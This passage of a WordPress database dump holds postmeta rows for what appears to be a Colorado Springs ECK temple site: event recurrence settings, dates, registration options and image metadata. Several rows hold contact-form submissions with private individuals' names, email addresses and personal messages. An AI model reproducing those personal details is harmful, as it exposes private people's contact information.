s:2:\"10\";}'),(151702,266075,'_wp_attached_file','2021/12/generic-event-6.jpg'),(151703,266075,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:719;s:6:\"height\";i:385;s:4:\"file\";s:27:\"2021/12/generic-event-6.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"generic-event-6-300x161.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:161;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"generic-event-6-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:27:\"generic-event-6-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:27:\"generic-event-6-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:27:\"generic-event-6-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:27:\"generic-event-6-300x385.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:27:\"generic-event-6-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(120892,263177,'_EventCost',''),(120866,263177,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1609513573;s:12:\"_EventOrigin\";i:1609513573;s:13:\"_thumbnail_id\";i:1609513848;s:24:\"boldgrid_hide_page_title\";i:1609513573;s:17:\"_EventShowMapLink\";i:1609513573;s:13:\"_EventShowMap\";i:1609513573;s:15:\"_EventStartDate\";i:1609513848;s:13:\"_EventEndDate\";i:1609513848;s:18:\"_EventStartDateUTC\";i:1609513848;s:16:\"_EventEndDateUTC\";i:1609513848;s:14:\"_EventDuration\";i:1609513573;s:20:\"_EventCurrencySymbol\";i:1609513573;s:22:\"_EventCurrencyPosition\";i:1609513573;s:10:\"_EventCost\";i:1609513573;s:9:\"_EventURL\";i:1609513573;s:14:\"_EventTimezone\";i:1609513573;s:18:\"_EventTimezoneAbbr\";i:1609513573;s:27:\"_EventNextPendingRecurrence\";i:1609513573;s:26:\"_RTECregistrationsDisabled\";i:1609513573;s:17:\"_RTECdeadlineType\";i:1609513573;s:19:\"_RTECwhoCanRegister\";i:1609513573;s:23:\"_RTEClimitRegistrations\";i:1609513573;s:21:\"_RTECmaxRegistrations\";i:1609513573;s:16:\"_EventRecurrence\";i:1609513573;s:18:\"_RTECnumRegistered\";i:1609513573;s:13:\"_EventVenueID\";i:1609513573;s:12:\"_dp_original\";i:1609513573;s:16:\"tribe_events_cat\";i:1609540873;s:10:\"_edit_last\";i:1609513648;s:10:\"post_title\";i:1609513648;s:12:\"post_content\";i:1609515673;s:11:\"post_status\";i:1609513848;}'),(120884,263177,'_EventShowMap',''),(120886,263177,'_EventEndDate','2021-01-13 20:00:00'),(116287,262810,'protect_children',''),(116288,262810,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1607511471;s:12:\"_EventOrigin\";i:1607511471;s:13:\"_thumbnail_id\";i:1607511471;s:26:\"_RTECregistrationsDisabled\";i:1607511471;s:17:\"_RTECdeadlineType\";i:1607511471;s:19:\"_RTECwhoCanRegister\";i:1607511471;s:23:\"_RTEClimitRegistrations\";i:1607511471;s:21:\"_RTECmaxRegistrations\";i:1607511471;s:24:\"boldgrid_hide_page_title\";i:1607511471;s:16:\"_EventRecurrence\";i:1607511471;s:17:\"_EventShowMapLink\";i:1607511471;s:13:\"_EventShowMap\";i:1607511471;s:13:\"_EventVenueID\";i:1607511471;s:20:\"_EventCurrencySymbol\";i:1607511471;s:22:\"_EventCurrencyPosition\";i:1607511471;s:10:\"_EventCost\";i:1607511471;s:9:\"_EventURL\";i:1607511471;s:14:\"_EventTimezone\";i:1607511471;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607511471;s:16:\"tribe_events_cat\";i:1607536671;}'),(116286,262810,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1607511471;s:12:\"_EventOrigin\";i:1607511471;s:13:\"_thumbnail_id\";i:1607511471;s:26:\"_RTECregistrationsDisabled\";i:1607511471;s:17:\"_RTECdeadlineType\";i:1607511471;s:19:\"_RTECwhoCanRegister\";i:1607511471;s:23:\"_RTEClimitRegistrations\";i:1607511471;s:21:\"_RTECmaxRegistrations\";i:1607511471;s:24:\"boldgrid_hide_page_title\";i:1607511471;s:16:\"_EventRecurrence\";i:1607511471;s:17:\"_EventShowMapLink\";i:1607511471;s:13:\"_EventShowMap\";i:1607511471;s:13:\"_EventVenueID\";i:1607511471;s:20:\"_EventCurrencySymbol\";i:1607511471;s:22:\"_EventCurrencyPosition\";i:1607511471;s:10:\"_EventCost\";i:1607511471;s:9:\"_EventURL\";i:1607511471;s:14:\"_EventTimezone\";i:1607511471;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607511471;s:16:\"tribe_events_cat\";i:1607536671;}'),(115033,262811,'_EventStartDate','2021-09-19 09:00:00'),(115034,262811,'_EventStartDateUTC','2021-09-19 15:00:00'),(116293,262810,'_RTECwhoCanRegister','any'),(92272,261533,'_bgppb_default_editor','bgppb'),(92273,261549,'_edit_last','2'),(92274,259324,'_bgppb_default_editor','bgppb'),(92275,259733,'_bgppb_default_editor','bgppb'),(92271,261549,'_edit_lock','1693797163:2'),(92270,261549,'protect_children',''),(125323,263323,'_EventCurrencySymbol',''),(125324,263323,'_EventCurrencyPosition','prefix'),(125325,263323,'_EventCost',''),(125326,263323,'_EventURL',''),(125327,263323,'_EventTimezone','America/Denver'),(121158,263208,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1609704512;s:12:\"_EventOrigin\";i:1609704512;s:13:\"_thumbnail_id\";i:1609704828;s:24:\"boldgrid_hide_page_title\";i:1609704512;s:17:\"_EventShowMapLink\";i:1609704512;s:13:\"_EventShowMap\";i:1609704512;s:15:\"_EventStartDate\";i:1609704828;s:13:\"_EventEndDate\";i:1609704828;s:18:\"_EventStartDateUTC\";i:1609704828;s:16:\"_EventEndDateUTC\";i:1609704828;s:14:\"_EventDuration\";i:1609704828;s:20:\"_EventCurrencySymbol\";i:1609704512;s:22:\"_EventCurrencyPosition\";i:1609704512;s:10:\"_EventCost\";i:1609704512;s:9:\"_EventURL\";i:1609704512;s:14:\"_EventTimezone\";i:1609704512;s:18:\"_EventTimezoneAbbr\";i:1609704512;s:27:\"_EventNextPendingRecurrence\";i:1609704512;s:26:\"_RTECregistrationsDisabled\";i:1609704512;s:17:\"_RTECdeadlineType\";i:1609704512;s:19:\"_RTECwhoCanRegister\";i:1609704512;s:23:\"_RTEClimitRegistrations\";i:1609704512;s:21:\"_RTECmaxRegistrations\";i:1609704512;s:16:\"_EventRecurrence\";i:1609704512;s:18:\"_RTECnumRegistered\";i:1609704512;s:13:\"_EventVenueID\";i:1609704512;s:12:\"_dp_original\";i:1609704512;s:16:\"tribe_events_cat\";i:1610245064;s:10:\"_edit_last\";i:1609704586;s:10:\"post_title\";i:1610219840;s:12:\"post_content\";i:1609704930;s:11:\"post_status\";i:1609704828;}'),(121179,263208,'_EventDuration','4500'),(121159,263208,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1609704512;s:12:\"_EventOrigin\";i:1609704512;s:13:\"_thumbnail_id\";i:1609704828;s:24:\"boldgrid_hide_page_title\";i:1609704512;s:17:\"_EventShowMapLink\";i:1609704512;s:13:\"_EventShowMap\";i:1609704512;s:15:\"_EventStartDate\";i:1609704828;s:13:\"_EventEndDate\";i:1609704828;s:18:\"_EventStartDateUTC\";i:1609704828;s:16:\"_EventEndDateUTC\";i:1609704828;s:14:\"_EventDuration\";i:1609704828;s:20:\"_EventCurrencySymbol\";i:1609704512;s:22:\"_EventCurrencyPosition\";i:1609704512;s:10:\"_EventCost\";i:1609704512;s:9:\"_EventURL\";i:1609704512;s:14:\"_EventTimezone\";i:1609704512;s:18:\"_EventTimezoneAbbr\";i:1609704512;s:27:\"_EventNextPendingRecurrence\";i:1609704512;s:26:\"_RTECregistrationsDisabled\";i:1609704512;s:17:\"_RTECdeadlineType\";i:1609704512;s:19:\"_RTECwhoCanRegister\";i:1609704512;s:23:\"_RTEClimitRegistrations\";i:1609704512;s:21:\"_RTECmaxRegistrations\";i:1609704512;s:16:\"_EventRecurrence\";i:1609704512;s:18:\"_RTECnumRegistered\";i:1609704512;s:13:\"_EventVenueID\";i:1609704512;s:12:\"_dp_original\";i:1609704512;s:16:\"tribe_events_cat\";i:1610245064;s:10:\"_edit_last\";i:1609704586;s:10:\"post_title\";i:1610219840;s:12:\"post_content\";i:1609704930;s:11:\"post_status\";i:1609704828;}'),(121178,263208,'_EventEndDateUTC','2021-01-16 21:15:00'),(121160,263208,'_EventOrigin','events-calendar'),(125305,263323,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610630420;s:12:\"_EventOrigin\";i:1610630420;s:13:\"_thumbnail_id\";i:1610630420;s:26:\"_RTECregistrationsDisabled\";i:1610630420;s:17:\"_RTECdeadlineType\";i:1610630420;s:19:\"_RTECwhoCanRegister\";i:1610630420;s:23:\"_RTEClimitRegistrations\";i:1610630420;s:21:\"_RTECmaxRegistrations\";i:1610630420;s:24:\"boldgrid_hide_page_title\";i:1610630420;s:16:\"_EventRecurrence\";i:1610630420;s:17:\"_EventShowMapLink\";i:1610630420;s:13:\"_EventShowMap\";i:1610630420;s:13:\"_EventVenueID\";i:1610630420;s:20:\"_EventCurrencySymbol\";i:1610630420;s:22:\"_EventCurrencyPosition\";i:1610630420;s:10:\"_EventCost\";i:1610630420;s:9:\"_EventURL\";i:1610630420;s:14:\"_EventTimezone\";i:1610630420;s:12:\"_dp_original\";i:1610630420;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610630420;s:16:\"tribe_events_cat\";i:1610655620;}'),(125319,263323,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"1\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-11-08\";s:14:\"EventStartDate\";s:19:\"2020-11-09 19:00:00\";s:12:\"EventEndDate\";s:19:\"2020-11-09 20:30:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(76473,128132,'protect_children',''),(77008,128992,'protect_children',''),(124841,263330,'_EventStartDate','2021-07-12 19:00:00'),(124808,263329,'_EventStartDate','2021-06-14 19:00:00'),(124809,263329,'_EventStartDateUTC','2021-06-15 01:00:00'),(125328,263323,'_dp_original','263319'),(128817,263450,'_seq_num','63'),(128816,263450,'_form_id','13'),(124569,263321,'_RTECregistrationsDisabled','1'),(124570,263321,'_RTECdeadlineType','start'),(124571,263321,'_RTECwhoCanRegister','any'),(124567,263321,'_EventOrigin','events-calendar'),(124575,263321,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"1\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-11-08\";s:14:\"EventStartDate\";s:19:\"2020-11-09 19:00:00\";s:12:\"EventEndDate\";s:19:\"2020-11-09 20:30:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(124576,263321,'_EventShowMapLink','1'),(124577,263321,'_EventShowMap','1'),(124578,263321,'_EventVenueID','262507'),(124579,263321,'_EventStartDate','2020-11-09 19:00:00'),(124580,263321,'_EventEndDate','2020-11-09 20:30:00'),(124581,263321,'_EventStartDateUTC','2020-11-10 02:00:00'),(124582,263321,'_EventEndDateUTC','2020-11-10 03:30:00'),(124583,263321,'_EventDuration','5400'),(124584,263321,'_EventCurrencySymbol',''),(124585,263321,'_EventCurrencyPosition','prefix'),(124586,263321,'_EventCost',''),(124587,263321,'_EventURL',''),(124588,263321,'_EventTimezone','America/Denver'),(124589,263321,'_EventTimezoneAbbr','MST'),(124590,263321,'_dp_original','263319'),(124591,263321,'_edit_lock','1620612573:2'),(124592,263321,'_edit_last','2'),(128815,263450,'_field_138','Hello,\n\nI recently moved to Colorado Springs and have been searching for a house of worship. My new home is close to your location and figured God might be telling me something. \n\nI look forward to hearing from you,\n\nAdam'),(128814,263450,'_field_137','New Neighbor'),(128813,263450,'_field_135','adam.pluth@gmail.com'),(128812,263450,'_field_134','Bluth'),(94516,261786,'_seq_num','53'),(94511,261786,'_field_134','Richard'),(94512,261786,'_field_135','annah.richard@summitstonehealth.org'),(94513,261786,'_field_137','COVID-19 Resources'),(94514,261786,'_field_138','Hello,\n\nMy name is Annah Richard, I’m a crisis counselor with the Colorado Spirit Program. I’m reaching out in an effort to provide resources to your organization and to give an explanation of how our program can support you guys. If you could put me in contact with the right person for this, I would really appreciate it!'),(94515,261786,'_form_id','13'),(91780,261498,'_field_224','Paul &amp;Linda'),(91781,261498,'_field_225','Morelli'),(91782,261498,'_field_226','resasofny@gmail.com'),(91783,261498,'_field_227','NY'),(91784,261498,'_field_228','US'),(91785,261498,'_field_229','a:1:{i:0;s:39:\"Central Colorado/ECK Temple in Colorado\";}'),(91786,261498,'_form_id','21'),(91787,261498,'_seq_num','92'),(91775,261497,'_edit_lock','1584564996:2'),(91776,261497,'original-file','2020/03/eck-logo-paypal-updraft-pre-smush-original.png'),(91777,261497,'smush-complete','1'),(91778,261497,'smush-info','The file was compressed from 16.31 KB to 6.53 KB saving 59.97 percent using WP-Optimize'),(91779,261497,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:16698;s:12:\"smushed-size\";i:6684;s:15:\"savings-percent\";d:59.97;}'),(121156,263208,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1609704512;s:12:\"_EventOrigin\";i:1609704512;s:13:\"_thumbnail_id\";i:1609704828;s:24:\"boldgrid_hide_page_title\";i:1609704512;s:17:\"_EventShowMapLink\";i:1609704512;s:13:\"_EventShowMap\";i:1609704512;s:15:\"_EventStartDate\";i:1609704828;s:13:\"_EventEndDate\";i:1609704828;s:18:\"_EventStartDateUTC\";i:1609704828;s:16:\"_EventEndDateUTC\";i:1609704828;s:14:\"_EventDuration\";i:1609704828;s:20:\"_EventCurrencySymbol\";i:1609704512;s:22:\"_EventCurrencyPosition\";i:1609704512;s:10:\"_EventCost\";i:1609704512;s:9:\"_EventURL\";i:1609704512;s:14:\"_EventTimezone\";i:1609704512;s:18:\"_EventTimezoneAbbr\";i:1609704512;s:27:\"_EventNextPendingRecurrence\";i:1609704512;s:26:\"_RTECregistrationsDisabled\";i:1609704512;s:17:\"_RTECdeadlineType\";i:1609704512;s:19:\"_RTECwhoCanRegister\";i:1609704512;s:23:\"_RTEClimitRegistrations\";i:1609704512;s:21:\"_RTECmaxRegistrations\";i:1609704512;s:16:\"_EventRecurrence\";i:1609704512;s:18:\"_RTECnumRegistered\";i:1609704512;s:13:\"_EventVenueID\";i:1609704512;s:12:\"_dp_original\";i:1609704512;s:16:\"tribe_events_cat\";i:1610245064;s:10:\"_edit_last\";i:1609704586;s:10:\"post_title\";i:1610219840;s:12:\"post_content\";i:1609704930;s:11:\"post_status\";i:1609704828;}'),(121181,263208,'_EventCurrencyPosition','prefix'),(121155,263208,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1609704512;s:12:\"_EventOrigin\";i:1609704512;s:13:\"_thumbnail_id\";i:1609704828;s:24:\"boldgrid_hide_page_title\";i:1609704512;s:17:\"_EventShowMapLink\";i:1609704512;s:13:\"_EventShowMap\";i:1609704512;s:15:\"_EventStartDate\";i:1609704828;s:13:\"_EventEndDate\";i:1609704828;s:18:\"_EventStartDateUTC\";i:1609704828;s:16:\"_EventEndDateUTC\";i:1609704828;s:14:\"_EventDuration\";i:1609704828;s:20:\"_EventCurrencySymbol\";i:1609704512;s:22:\"_EventCurrencyPosition\";i:1609704512;s:10:\"_EventCost\";i:1609704512;s:9:\"_EventURL\";i:1609704512;s:14:\"_EventTimezone\";i:1609704512;s:18:\"_EventTimezoneAbbr\";i:1609704512;s:27:\"_EventNextPendingRecurrence\";i:1609704512;s:26:\"_RTECregistrationsDisabled\";i:1609704512;s:17:\"_RTECdeadlineType\";i:1609704512;s:19:\"_RTECwhoCanRegister\";i:1609704512;s:23:\"_RTEClimitRegistrations\";i:1609704512;s:21:\"_RTECmaxRegistrations\";i:1609704512;s:16:\"_EventRecurrence\";i:1609704512;s:18:\"_RTECnumRegistered\";i:1609704512;s:13:\"_EventVenueID\";i:1609704512;s:12:\"_dp_original\";i:1609704512;s:16:\"tribe_events_cat\";i:1610245064;s:10:\"_edit_last\";i:1609704586;s:10:\"post_title\";i:1610219840;s:12:\"post_content\";i:1609704930;s:11:\"post_status\";i:1609704828;}'),(121177,263208,'_EventStartDateUTC','2021-01-16 20:00:00'),(118638,262911,'_EventVenueID','262507'),(118636,262911,'_EventShowMapLink','1'),(118637,262911,'_EventShowMap','1'),(118629,262911,'_RTECregistrationsDisabled','1'),(118630,262911,'_RTECdeadlineType','start'),(118631,262911,'_RTECwhoCanRegister','any'),(118632,262911,'_RTEClimitRegistrations','0'),(118633,262911,'_RTECmaxRegistrations','30'),(118628,262911,'_EventOrigin','events-calendar'),(118635,262911,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"First\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-03\";s:14:\"EventStartDate\";s:19:\"2020-12-06 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-06 10:15:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(117972,262915,'_EventStartDateUTC','2021-07-04 15:00:00'),(117884,262912,'_EventStartDate','2021-04-04 09:00:00'),(117885,262912,'_EventStartDateUTC','2021-04-04 15:00:00'),(117886,262912,'_EventEndDate','2021-04-04 10:15:00'),(117973,262915,'_EventEndDate','2021-07-04 10:15:00'),(117887,262912,'_EventEndDateUTC','2021-04-04 16:15:00'),(117888,262912,'_EventDuration','4500'),(118839,262954,'_RTEClimitRegistrations','0'),(118648,262912,'_tribe_modified_fields','a:19:{s:16:\"protect_children\";i:1607513875;s:12:\"_EventOrigin\";i:1607513875;s:26:\"_RTECregistrationsDisabled\";i:1607513875;s:17:\"_RTECdeadlineType\";i:1607513875;s:19:\"_RTECwhoCanRegister\";i:1607513875;s:23:\"_RTEClimitRegistrations\";i:1607513875;s:21:\"_RTECmaxRegistrations\";i:1607513875;s:24:\"boldgrid_hide_page_title\";i:1607513875;s:16:\"_EventRecurrence\";i:1607513875;s:17:\"_EventShowMapLink\";i:1607513875;s:13:\"_EventShowMap\";i:1607513875;s:13:\"_EventVenueID\";i:1607513875;s:20:\"_EventCurrencySymbol\";i:1607513875;s:22:\"_EventCurrencyPosition\";i:1607513875;s:10:\"_EventCost\";i:1607513875;s:9:\"_EventURL\";i:1607513875;s:14:\"_EventTimezone\";i:1607513875;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607513875;s:13:\"_thumbnail_id\";i:1607513875;}'),(118650,262912,'_RTECregistrationsDisabled','1'),(118651,262912,'_RTECdeadlineType','start'),(118652,262912,'_RTECwhoCanRegister','any'),(118653,262912,'_RTEClimitRegistrations','0'),(118654,262912,'_RTECmaxRegistrations','30'),(118655,262912,'boldgrid_hide_page_title','0'),(118649,262912,'_EventOrigin','events-calendar'),(118666,262912,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:10:{i:262909;a:2:{s:9:\"timestamp\";i:1609664400;s:8:\"duration\";i:4500;}i:262910;a:2:{s:9:\"timestamp\";i:1612688400;s:8:\"duration\";i:4500;}i:262911;a:2:{s:9:\"timestamp\";i:1615107600;s:8:\"duration\";i:4500;}i:262912;a:2:{s:9:\"timestamp\";i:1617526800;s:8:\"duration\";i:4500;}i:262913;a:2:{s:9:\"timestamp\";i:1619946000;s:8:\"duration\";i:4500;}i:262914;a:2:{s:9:\"timestamp\";i:1622970000;s:8:\"duration\";i:4500;}i:262915;a:2:{s:9:\"timestamp\";i:1625389200;s:8:\"duration\";i:4500;}i:262916;a:2:{s:9:\"timestamp\";i:1627808400;s:8:\"duration\";i:4500;}i:262917;a:2:{s:9:\"timestamp\";i:1630832400;s:8:\"duration\";i:4500;}i:262918;a:2:{s:9:\"timestamp\";i:1633251600;s:8:\"duration\";i:4500;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(118663,262912,'_EventURL',''),(118664,262912,'_EventTimezone','America/Denver'),(118656,262912,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"First\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-03\";s:14:\"EventStartDate\";s:19:\"2020-12-06 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-06 10:15:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(118657,262912,'_EventShowMapLink','1'),(118658,262912,'_EventShowMap','1'),(118659,262912,'_EventVenueID','262507'),(118660,262912,'_EventCurrencySymbol',''),(118661,262912,'_EventCurrencyPosition','prefix'),(118662,262912,'_EventCost',''),(118677,262913,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"First\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-03\";s:14:\"EventStartDate\";s:19:\"2020-12-06 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-06 10:15:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(118678,262913,'_EventShowMapLink','1'),(117913,262913,'_EventStartDate','2021-05-02 09:00:00'),(117914,262913,'_EventStartDateUTC','2021-05-02 15:00:00'),(117915,262913,'_EventEndDate','2021-05-02 10:15:00'),(117916,262913,'_EventEndDateUTC','2021-05-02 16:15:00'),(117917,262913,'_EventDuration','4500'),(118840,262954,'_RTECmaxRegistrations','30'),(118669,262913,'_tribe_modified_fields','a:19:{s:16:\"protect_children\";i:1607513875;s:12:\"_EventOrigin\";i:1607513875;s:26:\"_RTECregistrationsDisabled\";i:1607513875;s:17:\"_RTECdeadlineType\";i:1607513875;s:19:\"_RTECwhoCanRegister\";i:1607513875;s:23:\"_RTEClimitRegistrations\";i:1607513875;s:21:\"_RTECmaxRegistrations\";i:1607513875;s:24:\"boldgrid_hide_page_title\";i:1607513875;s:16:\"_EventRecurrence\";i:1607513875;s:17:\"_EventShowMapLink\";i:1607513875;s:13:\"_EventShowMap\";i:1607513875;s:13:\"_EventVenueID\";i:1607513875;s:20:\"_EventCurrencySymbol\";i:1607513875;s:22:\"_EventCurrencyPosition\";i:1607513875;s:10:\"_EventCost\";i:1607513875;s:9:\"_EventURL\";i:1607513875;s:14:\"_EventTimezone\";i:1607513875;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607513875;s:13:\"_thumbnail_id\";i:1607513875;}'),(118671,262913,'_RTECregistrationsDisabled','1'),(118672,262913,'_RTECdeadlineType','start'),(118673,262913,'_RTECwhoCanRegister','any'),(118674,262913,'_RTEClimitRegistrations','0'),(118675,262913,'_RTECmaxRegistrations','30'),(118676,262913,'boldgrid_hide_page_title','0'),(118670,262913,'_EventOrigin','events-calendar'),(118685,262913,'_EventTimezone','America/Denver'),(118687,262913,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:10:{i:262909;a:2:{s:9:\"timestamp\";i:1609664400;s:8:\"duration\";i:4500;}i:262910;a:2:{s:9:\"timestamp\";i:1612688400;s:8:\"duration\";i:4500;}i:262911;a:2:{s:9:\"timestamp\";i:1615107600;s:8:\"duration\";i:4500;}i:262912;a:2:{s:9:\"timestamp\";i:1617526800;s:8:\"duration\";i:4500;}i:262913;a:2:{s:9:\"timestamp\";i:1619946000;s:8:\"duration\";i:4500;}i:262914;a:2:{s:9:\"timestamp\";i:1622970000;s:8:\"duration\";i:4500;}i:262915;a:2:{s:9:\"timestamp\";i:1625389200;s:8:\"duration\";i:4500;}i:262916;a:2:{s:9:\"timestamp\";i:1627808400;s:8:\"duration\";i:4500;}i:262917;a:2:{s:9:\"timestamp\";i:1630832400;s:8:\"duration\";i:4500;}i:262918;a:2:{s:9:\"timestamp\";i:1633251600;s:8:\"duration\";i:4500;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(118679,262913,'_EventShowMap','1'),(118680,262913,'_EventVenueID','262507'),(118681,262913,'_EventCurrencySymbol',''),(118682,262913,'_EventCurrencyPosition','prefix'),(118683,262913,'_EventCost',''),(118684,262913,'_EventURL',''),(118596,262909,'_EventVenueID','262507'),(118597,262909,'_EventCurrencySymbol',''),(118598,262909,'_EventCurrencyPosition','prefix'),(118599,262909,'_EventCost',''),(118600,262909,'_EventURL',''),(118601,262909,'_EventTimezone','America/Denver'),(118603,262909,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:10:{i:262909;a:2:{s:9:\"timestamp\";i:1609664400;s:8:\"duration\";i:4500;}i:262910;a:2:{s:9:\"timestamp\";i:1612688400;s:8:\"duration\";i:4500;}i:262911;a:2:{s:9:\"timestamp\";i:1615107600;s:8:\"duration\";i:4500;}i:262912;a:2:{s:9:\"timestamp\";i:1617526800;s:8:\"duration\";i:4500;}i:262913;a:2:{s:9:\"timestamp\";i:1619946000;s:8:\"duration\";i:4500;}i:262914;a:2:{s:9:\"timestamp\";i:1622970000;s:8:\"duration\";i:4500;}i:262915;a:2:{s:9:\"timestamp\";i:1625389200;s:8:\"duration\";i:4500;}i:262916;a:2:{s:9:\"timestamp\";i:1627808400;s:8:\"duration\";i:4500;}i:262917;a:2:{s:9:\"timestamp\";i:1630832400;s:8:\"duration\";i:4500;}i:262918;a:2:{s:9:\"timestamp\";i:1633251600;s:8:\"duration\";i:4500;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(118594,262909,'_EventShowMapLink','1'),(118595,262909,'_EventShowMap','1'),(118586,262909,'_EventOrigin','events-calendar'),(118587,262909,'_RTECregistrationsDisabled','1'),(118588,262909,'_RTECdeadlineType','start'),(117366,262892,'_EventCurrencySymbol',''),(132399,262519,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"Third\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-04-18\";s:14:\"EventStartDate\";s:19:\"2020-12-20 11:30:00\";s:12:\"EventEndDate\";s:19:\"2020-12-20 13:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(132398,262519,'boldgrid_hide_page_title','0'),(132400,262519,'_EventShowMapLink','1'),(132401,262519,'_EventShowMap','1'),(132402,262519,'_EventCurrencySymbol',''),(132403,262519,'_EventCurrencyPosition','prefix'),(104895,262520,'_EventStartDate','2021-03-21 